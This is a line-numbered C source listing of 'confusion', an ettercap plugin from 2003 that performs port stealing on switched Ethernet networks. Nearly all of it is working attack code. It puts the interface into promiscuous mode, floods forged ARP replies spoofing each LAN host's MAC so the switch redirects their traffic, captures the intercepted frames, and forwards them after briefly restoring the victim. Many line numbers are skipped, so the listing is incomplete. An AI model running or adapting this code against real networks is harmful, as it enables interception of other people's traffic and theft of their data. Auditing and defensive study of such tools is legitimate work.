2
confusion -- ettercap plugin -- Port Stealer
4
Copyright (C) 2003 ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
6
This program is free software; you can redistribute it and/or modify
7
it under the terms of the GNU General Public License as published by
8
the Free Software Foundation; either version 2 of the License, or
9
(at your option) any later version.
11
This program is distributed in the hope that it will be useful,
12
but WITHOUT ANY WARRANTY; without even the implied warranty of
13
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14
GNU General Public License for more details.
16
You should have received a copy of the GNU General Public License
17
along with this program; if not, write to the Free Software
18
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
26
// #include <sys/time.h>
27
// #include <unistd.h>
32
#include "../../src/include/ec_main.h"
33
#include "../../src/include/ec_version.h"
34
#include "../../src/include/ec_plugins.h"
35
#include "../../src/include/ec_inet_structures.h"
36
#include "../../src/include/ec_inet.h"
37
#include "../../src/include/ec_inet_forge.h"
41
int Plugin_Init(void *);
42
int Plugin_Fini(void *);
43
int In_List(char *mac);
44
int confusion(void *dummy);
48
struct plugin_ops confusion_ops = {
49
ettercap_version: VERSION,
50
plug_info: "Port Stealing",
53
hook_point: HOOK_NONE,
54
hook_function: &confusion,
57
char FakeMAC[6] = {0x00, 0xfe, 0x00, 0x00, 0x00, 0x00};
58
char BroadMAC[6]= {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
59
char ArpMAC[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
61
//==================================
63
int Plugin_Init(void *params)
65
return Plugin_Register(params, &confusion_ops);
68
int Plugin_Fini(void *params)
73
// =================================
76
int In_List(char *mac)
81
if (!memcmp(mac, BroadMAC, 6)) return -1;
82
for (i=1; i< number_of_hosts_in_lan; i++)
84
Inet_GetMACfromString(Host_In_LAN[i].mac, TempMAC);
85
if (!memcmp(TempMAC, mac, 6)) return (i);
90
int confusion(void *dummy)
92
int sock, i=0, j, len, MTU, to_sleep=1;
93
struct recv_packet pck, s_pck;
94
u_long FakeIP=0x45454545, MyIP;
95
char MyMAC[6], SourceMAC[6], c[1]="";
96
ETH_header *eth, *rec_eth;
99
if (number_of_hosts_in_lan < 2)
101
Plugin_Output("\nYou have to build Host-List to use confusion\n");
105
Plugin_Output("\nUse this plugin only on switched networks\nBe sure to keep the NIC in promisc mode\nPress return to stop\n");
107
sock = Inet_OpenRawSock(Options.netiface);
108
Inet_GetIfaceInfo(Options.netiface, &MTU, MyMAC, &MyIP, NULL);
110
Inet_SetPromisc(Options.netiface);
112
pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
113
pck.aligned = pck.buf + ALIGN_ETH_TO_WORD;
115
s_pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
116
s_pck.aligned = s_pck.buf + ALIGN_ETH_TO_WORD;
118
Inet_SetNonBlock(sock);
122
Inet_GetMACfromString(Host_In_LAN[i+1].mac, SourceMAC);
123
Inet_Forge_ethernet(s_pck.aligned, SourceMAC, MyMAC, ETH_P_ARP);
124
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, SourceMAC, FakeIP, FakeMAC, FakeIP );
127
i%=(number_of_hosts_in_lan - 1);
129
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
132
if (Plugin_Input(c, 1, P_NONBLOCK))
134
for (i=1; i<number_of_hosts_in_lan; i++)
136
usleep(Options.storm_delay);
137
Inet_GetMACfromString(Host_In_LAN[i].mac, SourceMAC);
138
Inet_Forge_ethernet(s_pck.aligned, MyMAC, SourceMAC, ETH_P_ARP);
139
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[i].ip));
140
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
144
Inet_Forge_packet_destroy( pck.buf );
145
Inet_Forge_packet_destroy( s_pck.buf );
146
Inet_CloseRawSock(sock);
150
len = Inet_GetRawPacket(sock, pck.aligned, MTU, NULL);
152
if (to_sleep) usleep(Options.storm_delay);
157
eth = (ETH_header *) pck.aligned;
159
if ((j=In_List(eth->dest_mac)) > 0)
162
s_sock = Inet_OpenRawSock(Options.netiface);
164
Inet_Forge_ethernet(s_pck.aligned, MyMAC, BroadMAC, ETH_P_ARP);
165
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[j].ip));
166
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
168
if (In_List(eth->source_mac)==-1)
169
memcpy(eth->source_mac, MyMAC, 6);
173
if (Inet_GetRawPacket(s_sock, s_pck.aligned, MTU, NULL)<=0) continue;
174
rec_eth = (ETH_header *) s_pck.aligned;
175
} while (memcmp(rec_eth->source_mac, eth->dest_mac, 6) || memcmp(rec_eth->dest_mac, MyMAC, 6) || rec_eth->type != htons(ETH_P_ARP));
177
Inet_SendRawPacket(sock, pck.aligned, len);
179
Inet_CloseRawSock(s_sock);
181
Inet_Forge_ethernet(s_pck.aligned, eth->dest_mac, MyMAC, ETH_P_ARP);
182
Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, eth->dest_mac, FakeIP, FakeMAC, FakeIP );
183
Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);